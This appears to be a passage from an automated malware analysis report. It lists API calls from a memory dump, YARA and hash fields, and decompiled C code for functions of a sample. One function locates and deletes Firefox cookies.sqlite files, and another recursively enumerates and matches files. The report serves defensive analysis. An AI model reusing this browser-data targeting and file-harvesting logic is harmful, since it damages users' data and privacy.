                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 013C06A9
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 013C06B3
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 013C06D0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 013C06DC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,Function_0001B310,00000000,00000000,Function_0001B310,00000000,00000002,Function_0001B310,?), ref: 013C0713
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,Function_0001B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 013C0720
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,?), ref: 013C0730
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,?), ref: 013C0740
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,Function_0001B310,?), ref: 013C0750
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 013C075A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 013C0774
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0780
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C078C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0795
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C079E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 013C07A7
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 013C07B0
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013C07C2
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,013CBFB8,013C6A54), ref: 013C07D6
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013C07E8
                                            • FindFirstFileW.KERNEL32(00000000), ref: 013C07EF
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,013C5898), ref: 013C0817
                                            • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 013C0824
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C0830
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 013C0850
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C085A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0866
                                            • FindNextFileW.KERNEL32(?,?), ref: 013C087C
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,013C5A28), ref: 013C0898
                                            • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 013C089F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C08AB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 013C08CB
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C08D5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C08E1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C08FC
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 013C0911
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C091A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C092B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C0934
                                              • Part of subcall function 013C2795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27A4
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27AE
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27B7
                                              • Part of subcall function 013C2795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27C1
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27CB
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?), ref: 013C27E1
                                              • Part of subcall function 013C2795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27EA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                            • String ID:
                                            • API String ID: 2968164691-0
                                            • Opcode ID: c4e7baa56123465671baf3ce410b00aefe7378633e5f59e5e4716c60e6f31255
                                            • Instruction ID: b43a044dabfa0b64f772e2bc9533fb62a276070b42f0d2268dc90d5f567f448c
                                            • Opcode Fuzzy Hash: c4e7baa56123465671baf3ce410b00aefe7378633e5f59e5e4716c60e6f31255
                                            • Instruction Fuzzy Hash: 45B13172E0020A9FDB14EBA4EC59EEE7B7CAF24705F144059F516A2094EF707A49CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,74786490,00000000), ref: 013B752D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 013B753A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 013B754C
                                            • getenv.MSVCRT ref: 013B7558
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 013B7564
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B7570
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B7579
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B7582
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,013C5BC8,?), ref: 013B759C
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 013B75A6
                                            • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 013B75AD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 013B75B9
                                            • FindClose.KERNEL32(000000FF,?,?,?), ref: 013B75C7
                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 013B75F0
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 013B768B
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 013B7698
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76A4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76AD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76B6
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76BF
                                            • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76C6
                                            • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76D0
                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B76EC
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 013B7704
                                              • Part of subcall function 013B7A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,013B78A9), ref: 013B7A9E
                                              • Part of subcall function 013B7A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,013B78A9), ref: 013B7AB1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 013B7717
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 013B7720
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                            • API String ID: 2907366228-432212279
                                            • Opcode ID: b82c3b89a01daef7b6d9b2017f8ca673bb4f27d6e8e06df3b743ced9a6c70542
                                            • Instruction ID: c826268c0301e12a24372cba762d2db23336f159a609cdf39cbce1cb012830f2
                                            • Opcode Fuzzy Hash: b82c3b89a01daef7b6d9b2017f8ca673bb4f27d6e8e06df3b743ced9a6c70542
                                            • Instruction Fuzzy Hash: BF617531A0420EAFCF119FA8D899AEEBF7CEF5571AF440154E942D2190FB71B64ACB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B4C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 16%
                                            			E013B4C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E013B504F( &_v5,  &_v5, _t60, __imp__tolower);
				L013C4146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L013C414C();
						L013C4152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E013B4C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E013B504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E013C2855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L013C4140();
						L013C4140();
						_t81 = E013B2440( &_v96, 0x66, _t96,  &_v96, _t80, _t79,  &E013CB310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                            0x013b4c16
                                            0x013b4c18
                                            0x013b4c1f
                                            0x013b4c2f
                                            0x013b4c39
                                            0x013b4c43
                                            0x013b4c4a
                                            0x013b4c66
                                            0x013b4c6b
                                            0x013b4c70
                                            0x013b4c80
                                            0x013b4c83
                                            0x013b4c8d
                                            0x013b4e83
                                            0x013b4e86
                                            0x013b4e8f
                                            0x013b4e98
                                            0x00000000
                                            0x013b4e9e
                                            0x013b4c93
                                            0x013b4cb2
                                            0x013b4cfa
                                            0x013b4d0c
                                            0x013b4d19
                                            0x013b4d27
                                            0x013b4d30
                                            0x013b4d3f
                                            0x013b4d45
                                            0x013b4d4e
                                            0x013b4d56
                                            0x013b4d5e
                                            0x013b4d5e
                                            0x013b4d6b
                                            0x013b4d72
                                            0x013b4d7c
                                            0x013b4d86
                                            0x013b4d90
                                            0x013b4d97
                                            0x013b4d9c
                                            0x013b4d9f
                                            0x013b4da8
                                            0x013b4db6
                                            0x013b4e44
                                            0x013b4e47
                                            0x00000000
                                            0x013b4dbc
                                            0x013b4dc3
                                            0x013b4dcf
                                            0x013b4dd9
                                            0x013b4de2
                                            0x013b4ded
                                            0x013b4df0
                                            0x013b4e00
                                            0x013b4e08
                                            0x013b4e0c
                                            0x013b4e16
                                            0x013b4e20
                                            0x013b4e25
                                            0x013b4e31
                                            0x013b4e3a
                                            0x013b4e42
                                            0x013b4e55
                                            0x013b4e5e
                                            0x013b4e67
                                            0x013b4e70
                                            0x00000000
                                            0x013b4e76
                                            0x00000000
                                            0x013b4e42
                                            0x013b4db6
                                            0x013b4e7d
                                            0x00000000

                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,013CB310,?,768C9F40), ref: 013B4C1F
                                            • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76872590,?,768C9F40), ref: 013B4C2F
                                            • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,768C9F40), ref: 013B4C39
                                            • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,768C9F40), ref: 013B4C43
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,013C594C,?), ref: 013B4C66
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 013B4C70
                                            • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 013B4C77
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 013B4C83
                                            • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 013B4C9D
                                            • wcscmp.MSVCRT ref: 013B4CCA
                                            • wcscmp.MSVCRT ref: 013B4CE2
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 013B4CFA
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 013B4D0C
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 013B4D19
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B4D27
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B4D30
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B4D3F
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B4D4E
                                              • Part of subcall function 013B4C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B4D5E
                                              • Part of subcall function 013B4C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E55
                                              • Part of subcall function 013B4C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E5E
                                              • Part of subcall function 013B4C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E67
                                              • Part of subcall function 013B4C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E70
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 013B4D72
                                            • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76872590,?,?,?), ref: 013B4D7C
                                            • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 013B4D86
                                            • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 013B4D90
                                            • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 013B4DA8
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 013B4DCF
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B4DD9
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B4DE2
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,013CB310,?), ref: 013B4E0C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 013B4E16
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E31
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E3A
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 013B4E47
                                            • FindClose.KERNEL32(000000FF,?,?,?), ref: 013B4E7D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 013B4E86
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 013B4E8F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 013B4E98
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
